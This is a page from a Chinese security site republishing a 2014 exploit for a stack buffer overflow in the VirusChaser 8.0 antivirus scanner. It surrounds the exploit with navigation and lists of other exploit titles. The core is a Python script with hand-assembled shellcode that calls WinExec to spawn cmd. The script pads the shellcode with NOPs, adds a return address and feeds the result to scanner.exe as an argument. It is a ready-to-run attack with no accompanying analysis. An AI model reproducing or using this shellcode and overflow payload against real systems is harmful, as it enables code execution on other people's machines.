首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VirusChaser 8.0 - Stack Buffer Overflow
来源:vfocus.net 作者:wh1ant 发布时间:2014-03-27  
# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run
  
from struct import pack
import os
  
shellcode = "\x66\x83\xc4\x10"        # add esp, 0x10
shellcode += "\xb8\x50\x70\x50\x50"   # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27"   # mov ecx, 0x27047d4e
shellcode += "\x03\xc1"               # add eax, ecx  ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01"   # push 0x01646D63
shellcode += "\x66\xb9\x50\x50"       # add cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf"   # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03"       # mov [esp+3], cl
shellcode += "\x8b\xd4"               # mov edx, esp
shellcode += "\x66\x51"               # push cx
shellcode += "\x41"                   # inc cx
shellcode += "\x66\x51"               # push cx
shellcode += "\x52"                   # push edx
shellcode += "\x50"                   # push eax
shellcode += "\x50"                   # push eax
shellcode += "\xc3\x90"               # retn  ; WinExec()
  
# BOF retn: 0x0040753d
  
pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"
  
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Couchdb 1.5.0 - uuids DoS Expl
·IBM Tealeaf CX 8.8 - Remote OS
·Katello (Red Hat Satellite) us
·Haihaisoft Universal Player 1.
·SePortal 2.5 SQL Injection / R
·Haihaisoft HUPlayer 1.0.4.8 (.
·Fitnesse Wiki Remote Command E
·LifeSize UVC Authenticated Rem
·AudioCoder 0.8.29 - Memory Cor
·FreePBX config.php Remote Code
·GOMMP 2.2.56.5183 Memory Corru
·PhonerLite 2.14 SIP Soft Phone
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved